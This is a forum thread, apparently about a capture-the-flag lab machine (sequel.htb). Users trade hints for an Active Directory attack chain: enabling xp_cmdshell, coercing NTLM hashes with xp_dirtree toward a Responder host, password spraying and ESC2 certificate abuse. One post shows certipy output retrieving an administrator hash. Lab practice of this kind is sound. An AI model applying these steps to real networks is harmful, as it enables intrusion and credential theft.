Posts: 17
Threads: 0
Joined: May 2024
(Jan 12, 2025, 12:18 AM)0xbeef Wrote: (Jan 11, 2025, 08:22 PM)macavitysworld Wrote: - xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc
Being trying that ESC2 privesc no luck. Any more deets ?
Youll have to make sure Ryan has the correct privs to over write the password. Look at Bloodhound it will show you the path when you click on the relationship between Ryan and the CA account.
Posts: 49
Threads: 0
Joined: Dec 2024
(Jan 12, 2025, 01:52 AM)bkbk Wrote: (Jan 12, 2025, 12:18 AM)0xbeef Wrote: (Jan 11, 2025, 08:22 PM)macavitysworld Wrote: - xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc
Being trying that ESC2 privesc no luck. Any more deets ?
Youll have to make sure Ryan has the correct privs to over write the password. Look at Bloodhound it will show you the path when you click on the relationship between Ryan and the CA account.
got it thanks ! This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason: Leeching.
Posts: 24
Threads: 0
Joined: Dec 2024
(Jan 11, 2025, 10:21 PM)hollb_geek Wrote: The xlsx files are corrupted on my side when I try to open them, is it the same for anyone else ?
You can use Jumpshare to open them online as well.
Posts: 14
Threads: 1
Joined: Sep 2024
(Jan 12, 2025, 04:22 AM)0xbeef Wrote: (Jan 12, 2025, 01:52 AM)bkbk Wrote: (Jan 12, 2025, 12:18 AM)0xbeef Wrote: (Jan 11, 2025, 08:22 PM)macavitysworld Wrote: - xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc
Being trying that ESC2 privesc no luck. Any more deets ?
Youll have to make sure Ryan has the correct privs to over write the password. Look at Bloodhound it will show you the path when you click on the relationship between Ryan and the CA account.
got it thanks !
im stuck on Ryan i have bloodhound up but cant seem to find a place to write
Posts: 4
Threads: 1
Joined: Dec 2023
Posts: 14
Threads: 1
Joined: Sep 2024
Jan 12, 2025, 08:32 AM
(This post was last modified: Jan 12, 2025, 08:39 AM by nt0wl.)
└─$ certipy-ad auth -pfx administrator_dc01.pfx -dc-ip ${ip}
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Found multiple identifications in certificate
[*] Please select one:
[0] UPN: 'Administrator@sequel.htb'
[1] DNS Host Name: 'dc01.sequel.htb'
> 0
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:*********
i finally got it omg
thank you for everyone that contributed much is appreciated
Posts: 7
Threads: 0
Joined: Aug 2024
Jan 12, 2025, 01:25 PM
(This post was last modified: Jan 12, 2025, 01:29 PM by travellerswimmer.)
(Jan 12, 2025, 07:22 AM)who4mi Wrote: how to find xlsx files ?
use smbclient to look at shares using the creds given.
(You can also use spider module of cme to get a list of files.)
(Jan 11, 2025, 11:04 PM)flast94711 Wrote: (Jan 11, 2025, 10:54 PM)Zer0Gr2vity Wrote: (Jan 11, 2025, 08:22 PM)macavitysworld Wrote: - xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc
im not trying to enumarting as sql_svc im really confused how can i fidn ryan credentiel
Ryan's creds are located inside the sql-Configuration.INI file. The password is the same as the sql_svc account.
Where can I find "sql-Configuration.INI file". Have creds for a user, other than rose, but cannot find ryan anywhere.
Posts: 11
Threads: 0
Joined: Sep 2024
(Jan 12, 2025, 01:25 PM)travellerswimmer Wrote: (Jan 12, 2025, 07:22 AM)who4mi Wrote: how to find xlsx files ?
use smbclient to look at shares using the creds given.
(You can also use spider module of cme to get a list of files.)
(Jan 11, 2025, 11:04 PM)flast94711 Wrote: (Jan 11, 2025, 10:54 PM)Zer0Gr2vity Wrote: (Jan 11, 2025, 08:22 PM)macavitysworld Wrote: - xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc
im not trying to enumarting as sql_svc im really confused how can i fidn ryan credentiel
Ryan's creds are located inside the sql-Configuration.INI file. The password is the same as the sql_svc account.
Where can I find "sql-Configuration.INI file". Have creds for a user, other than rose, but cannot find ryan anywhere.
Rule of thumb is always to spray all the passwords found against list of users
Posts: 3
Threads: 0
Joined: Jan 2025
(Jan 11, 2025, 08:22 PM)macavitysworld Wrote: - xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc
help, pls, im stucked at EXEC xp_dirtree "\\my-ip\share", have responder. NTLM requested to it. But john/hashcat with rockyou.txt have no crack
Posts: 3
Threads: 0
Joined: Jan 2025
(Jan 12, 2025, 01:54 PM)greenfire Wrote: (Jan 12, 2025, 01:25 PM)travellerswimmer Wrote: (Jan 12, 2025, 07:22 AM)who4mi Wrote: how to find xlsx files ?
use smbclient to look at shares using the creds given.
(You can also use spider module of cme to get a list of files.)
(Jan 11, 2025, 11:04 PM)flast94711 Wrote: (Jan 11, 2025, 10:54 PM)Zer0Gr2vity Wrote: (Jan 11, 2025, 08:22 PM)macavitysworld Wrote: - xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc
im not trying to enumarting as sql_svc im really confused how can i fidn ryan credentiel
Ryan's creds are located inside the sql-Configuration.INI file. The password is the same as the sql_svc account.
Where can I find "sql-Configuration.INI file". Have creds for a user, other than rose, but cannot find ryan anywhere.
Rule of thumb is always to spray all the passwords found against list of users 
yeap, enum works for it. got ryan
|